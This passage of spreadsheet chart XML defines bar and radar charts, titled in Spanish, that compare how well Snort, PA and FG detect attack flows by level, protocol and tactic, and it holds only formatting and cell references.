                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ - LV1 - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$571:$X$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$573:$W$578</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$573:$X$578</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$571:$Y$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$573:$W$578</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$573:$Y$578</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="494484406"/>
        <c:axId val="1458672301"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="494484406"/>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1458672301"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1458672301"/>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494484406"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart127.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ - LV2 - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$571:$Z$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$573:$W$578</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$573:$Z$578</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$AA$571:$AA$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="1F1F1F"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$573:$W$578</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$AA$573:$AA$578</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1212847787"/>
        <c:axId val="1500784648"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1212847787"/>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1500784648"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1500784648"/>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212847787"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart128.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ DE ATAQUES POR PROTOCOLO - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.0319331983805668"/>
          <c:y val="0.05"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$603</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$604:$W$622</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$604:$X$622</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$603</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$604:$W$622</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$604:$Y$622</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$603</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$604:$W$622</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$604:$Z$622</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="718010046"/>
        <c:axId val="988810145"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="718010046"/>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988810145"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="988810145"/>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718010046"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart129.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN DE FLUJOS CON ATAQUE SNORT VS PA VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.03086330935251799"/>
          <c:y val="0.047668997668997674"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:axId val="1807186343"/>
        <c:axId val="440235033"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1807186343"/>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440235033"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="440235033"/>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807186343"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart130.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS PA VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.030764563106796143"/>
          <c:y val="0.14497041420118342"/>
          <c:w val="0.8033840260922329"/>
          <c:h val="0.8050295857988166"/>
        </c:manualLayout>
      </c:layout>
      <c:radarChart>
        <c:radarStyle val="marker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="7F6000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$39:$U$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="F1C232">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$39:$V$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFD966">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$39:$W$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$39:$X$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FF6D01"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$39:$Y$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="46BDC6"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$39:$Z$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:axId val="1811638682"/>
        <c:axId val="1399393464"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="1811638682"/>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1399393464"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1399393464"/>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811638682"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart13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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS PA VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.03086330935251799"/>
          <c:y val="0.05233100233100234"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$39:$U$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$39:$Y$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Z$39:$Z$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="364863112"/>
        <c:axId val="2030691165"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="364863112"/>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2030691165"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2030691165"/>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364863112"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart13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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ FLUJOS - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="2"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$235:$V$240</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$235:$W$240</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="571115344"/>
        <c:axId val="1610344958"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="571115344"/>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1610344958"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1610344958"/>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571115344"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart13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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos por Táctica - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$266:$V$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$266:$W$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$266:$V$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$266:$X$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$266:$V$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$266:$Y$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="779565581"/>
        <c:axId val="1917103078"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="779565581"/>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1917103078"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1917103078"/>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779565581"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
